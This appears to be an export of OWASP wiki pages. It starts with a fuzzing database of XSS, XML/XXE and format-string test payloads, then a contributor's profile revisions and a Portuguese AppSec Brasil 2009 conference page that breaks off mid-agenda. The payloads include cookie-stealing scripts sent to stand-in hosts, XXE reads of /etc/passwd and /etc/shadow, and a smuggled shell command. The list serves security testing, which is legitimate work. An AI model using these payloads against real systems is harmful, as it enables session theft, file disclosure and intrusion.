"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Foobar@email.de<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| project_description = <br />
| leader_name = Wagner Elias<br />
| leader_email = <br />
| leader_username = Wagner.elias<br />
| maintainer_name = <br />
| maintainer_email = <br />
| maintainer_username = <br />
| contributor_name1 = <br />
| contributor_email1 = <br />
| contributor_username1 = <br />
| contributor_name2 = <br />
| contributor_email2 = <br />
| contributor_username2 = <br />
| contributor_name3 = <br />
| contributor_email3 = <br />
| contributor_username3 = <br />
| contributor_name4 = <br />
| contributor_email4 = <br />
| contributor_username4 = <br />
| contributor_name5 = <br />
| contributor_email5 = <br />
| contributor_username5 = <br />
| contributor_name6 = <br />
| contributor_email6 = <br />
| contributor_username6 = <br />
| contributor_name7 = <br />
| contributor_email7 = <br />
| contributor_username7 = <br />
| contributor_name8 = <br />
| contributor_email8 = <br />
| contributor_username8 = <br />
| contributor_name9 = <br />
| contributor_email9 = <br />
| contributor_username9 = <br />
| contributor_name10 = <br />
| contributor_email10 = <br />
| contributor_username10 = <br />
| pamphlet_link = <br />
| mailing_list_name = owasp-fuzzing-code-database<br />
| links_url1 = <br />
| links_name1 = <br />
| links_url2 = <br />
| links_name2 = <br />
| links_url3 = <br />
| links_name3 = <br />
| links_url4 = <br />
| links_name4 = <br />
| links_url5 = <br />
| links_name5 = <br />
| links_url6 = <br />
| links_name6 = <br />
| links_url7 = <br />
| links_name7 = <br />
| links_url8 = <br />
| links_name8 = <br />
| links_url9 = <br />
| links_name9 = <br />
| links_url10 = <br />
| links_name10 = <br />
| project_road_map =<br />
| project_health_status = <br />
| current_release_name = <br />
| current_release_date = <br />
| current_release_download_link = <br />
| current_release_rating = <br />
| current_release_leader_name = <br />
| current_release_leader_email = <br />
| current_release_leader_username = <br />
| last_reviewed_release_name = <br />
| last_reviewed_release_date = <br />
| last_reviewed_release_download_link = <br />
| last_reviewed_release_rating = <br />
| last_reviewed_release_leader_name = <br />
| last_reviewed_release_leader_email = <br />
| last_reviewed_release_leader_username = <br />
| old_release_name1 = <br />
| old_release_date1 = <br />
| old_release_download_link1 = <br />
| old_release_name2 = <br />
| old_release_date2 = <br />
| old_release_download_link2 = <br />
| old_release_name3 = <br />
| old_release_date3 = <br />
| old_release_download_link3 = <br />
| old_release_name4 = <br />
| old_release_date4 = <br />
| old_release_download_link4 = <br />
| old_release_name5 = <br />
| old_release_date5 = <br />
| old_release_download_link5 = <br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&diff=105961
User:Ulisses Castro
2011-02-28T18:22:50Z
<p>Ulisses Castro: </p>
<hr />
<div>* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact], [[:Special:Contributions/Ulisses_Castro|wiki contributions]] and [http://ulissescastro.com personal blog].<br />
<br />
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.<br />
<br />
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&diff=105960
User:Ulisses Castro
2011-02-28T18:21:59Z
<p>Ulisses Castro: </p>
<hr />
<div>* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact] and [[:Special:Contributions/Ulisses_Castro|wiki contributions]].<br />
* [http://ulissescastro.com http://ulissescastro.com]<br />
<br />
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.<br />
<br />
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&diff=105959
User:Ulisses Castro
2011-02-28T18:21:00Z
<p>Ulisses Castro: </p>
<hr />
<div>* Ulisses Castro's [mailto:uss.thebug@gmail.com mail contact] and [[:Special:Contributions/Ulisses_Castro|wiki contributions]].<br />
* [http://ulissescastro.com link title]<br />
<br />
Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.<br />
<br />
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=User:Ulisses_Castro&diff=105958
User:Ulisses Castro
2011-02-28T18:17:43Z
<p>Ulisses Castro: </p>
<hr />
<div>Ulisses Castro is a Senior Security Consultant and Researcher within the Application Security practice at Conviso Application Security. Conviso has an advanced security team responsible for Penetration Testing, Application Security, and Incident Response to many clients around the globe.<br />
<br />
Ulisses has been involved with information security for a decade. Before Conviso, he worked as *nix System Administrator. Also presents at international security and free software events including OWASP AppSec Brazil, FISL and some others national events.</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&diff=73667
AppSec Brasil 2009 (pt-br)
2009-11-18T14:40:24Z
<p>Ulisses Castro: /* Datas */</p>
<hr />
<div>= Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009) =<br />
<br />
A comunidade [http://www.ticontrole.gov.br Comunidade TI-Controle] e o Centro de Informática da [http://www.camara.gov.br Câmara dos Deputados] apresentam a '''Conferência Internacional de Segurança de Aplicações''', que será realizada com o apoio do OWASP ([http://www.owasp.org/index.php/About_OWASP Open Web Application Security Project]) em [http://en.wikipedia.org/wiki/Brasília Brasília], capital do Brasil. A conferência consistirá de dois dias de treinamentos, seguidos de dois dias de plenárias em trilha única. <br />
<br />
[[Image:Brasilia Panorama.jpg]] <br />
<br />
== Datas ==<br />
<br />
A Conferência ocorrerá do dia 27 ao 30 de outubro de 2009. Os dias 27 e 28 de outubro serão dedicados ao mini-cursos e os dias 29 e 30 terão as sessões plenárias. <br />
<br />
<br> <br />
<br />
==== Promoção ====<br />
<br />
Esta conferência é promovida pela Comunidade [http://www.ticontrole.gov.br TI-Controle] e organizada pelo Centro de Informática da [http://www.camara.gov.br/ Câmara dos Deputados]. <br />
<br />
A Conferência tem o apoio do OWASP, [[Brazilian|Capítulo Brasil]], como provedor de conteúdo (seleção de palestras e cursos e montagem da grade de horários). <br />
<br />
A Conferência tem o apoio da [http://www.unb.br Universidade de Brasília (UnB)] [[Image:Unb.gif|60px]] <br />
<br />
A Conferência tem o patrocínio de [http://www.conviso.com.br Conviso IT Security] [[Image:CorVersao BR Small.jpg|100px]] e [http://www.leadcomm.com.br LeadComm] [[Image:LeadComm Logo Screen.jpg|100px]] <br />
<br />
==== Keynotes ====<br />
<br />
'''Gary McGraw''' <br />
<br />
CTO, [http://www.cigital.com Cigital] <br />
<br />
<br> <br />
<br />
[[Image:GaryMcGraw.JPG|left|60px]] <br />
<br />
''Título:'' '''O Modelo de Maturidade Building Security In (BSIMM)''' <br />
<br />
''Biografia:'' Gary McGraw é o CTO da Cigital, Inc., uma empresa de segurança e qualidade de software com sede em Washington, Estados Unidos. Ele é reconhecido mundialmente como uma autoridade em segurança de software e é autor de oito importantes livros sobre este tópico, incluindo: "Java Security", "Building Secure Software", "Exploiting software", "Software Security" e "Exploiting Online Games". Ele é também editor da série de livros sobre segurança de software na editora Addison-Wesley. Dr. McGraw também escreveu mais de 100 artigos científicos, escreve uma coluna mensal para o site informIT e é frequentemente citado na mídia. Além de servir como consultor estratégico para importantes empresas e executivos de TI, Gary faz parte dos Conselhos Administrativos das empresas Fortify Software e Raven White. Ele recebeu um PhD duplo em Ciência Cognitiva e Ciência da Computação pela Universidade de Indiana, onde ele faz parte do Conselho Consultivo da Escola de Informática. Ele também produz o podcast "Silver Bullet" para a revista IEEE Security &amp; Privacy e produz o podcast Reality Check Security para o site CSO online. <br />
<br />
<br> <br />
<br />
'''Jason Li''' <br />
<br />
[http://www.aspectsecurity.com Aspect Security] <br />
<br />
''Título:'' '''Ágil e Seguro: É possível fazer os dois?''' <br />
<br />
Co-autor: '''Jerry Hoff''', Aspect Security <br />
<br />
''Biografias:'' Jason Li é engenheiro senior de segurança de aplicações na Aspect Security. Jason conduz revisões de arquiteturas de segurança, revisão de segurança em código de aplicações, testes de segurança e provê treinamentos de segurança em aplicações Web para diversas empresas do ramo de varejo, financeiro e governamentais. Ele também é ativamente envolvido na OWASP, apoiando do Comitê de Projetos Globais da OWASP e como co-autor do Projeto Antisamy da OWASP (versão Java). Jason obteve seu pós-mestrado em Ciências da Computação com concentração em Segurança da Informação pela Universidade Johns Hopkins. Ele obteve seu grau de Mestre em Ciências da Computação pela Universidade Cornell, onde obteve também sua graduação dupla, em Ciências da COmputação e Pesquisador de Operações. <br />
<br />
Jerry Hoff é engenheiro senior de segurança de aplicações na Aspect Security. Jerry coordena e executa numerosas revisões de segurança em código de aplicações para clientes de diversas industrias. Jerry também fornece treinamentos para clientes e possui mais de 10 anos de experiência ensinando e desenvolvendo. Jerry também é envolvido com a OWASP e foi o líder do projeto AntiSamy .net. Ele possui mestrado em Ciências da Computação pela Universidade de Washington em St. Louis. <br />
<br />
<br> <br />
<br />
'''Dinis Cruz''' <br />
<br />
OWASP Board <br />
<br />
''Título:'' '''A Definir''' <br />
<br />
''Biografia:'' <br />
<br />
A definir. <br />
<br />
<br> <br />
<br />
'''Kuai Hinojosa''' <br />
<br />
OWASP <br />
<br />
''Título:'' '''Implementando Aplicações Web Seguras Usando Recursos do OWASP''' <br />
<br />
''Biografia:'' <br />
<br />
Kuai Hinojosa desenvolve e protege aplicações Web por mais de 12 anos. Anteriormente, ele trabalhou no setor bancário como administrador de segurança de base de dados para o quinto maior banco dos Estados Unidos, onde ele trabalhou em um pequeno time de desenvolvimento de aplicações para proteção dos ativos da empresa. Ele trabalha agora na Universidade de Nova Yorque como Especialista de Aplicações Web onde ele continua a empregar o desenvolvimento de aplicações Web e a experiência em segurança de aplicações para proteger os recursos da universidade. Em seu tempo livre, Kuai se voluntaria para catequisar sermões de segurança de aplicações and liderar o capítulo de Mineapolis da OWASP. Kuai é membro do Comitê Global de Edução da OWASP. <br />
<br />
<br> <br />
<br />
==== Agenda ====<br />
<br />
'''Programa da Conferência - Dia 1 - 29 de outubro de 2009 ''' <br />
<center><br />
{| width="80%" class="t"<br />
|-<br />
| width="14%" height="17" align="right" | 08:30 - 09:00 <br />
| bgcolor="#8595c2" align="CENTER" | '''Recepção'''<br />
|-<br />
| width="14%" height="17" align="right" | 09:00 - 10:00 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Abertura'''<br />
|-<br />
| width="14%" height="49" align="right" | 10:00 - 10:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Dinis Cruz<br>''' Apresentação do Projeto OWASP<br />
|-<br />
| width="14%" height="32" align="right" | 10:30 - 12:30 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Gary McGraw (Cigital)<br>''' Modelo de Maturidade Building Security In (BSIMM)<br />
|-<br />
| width="14%" height="17" align="right" | 12:30 - 14:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Almoço'''<br />
|-<br />
| width="14%" height="47" align="right" | 14:00 - 14:50 <br />
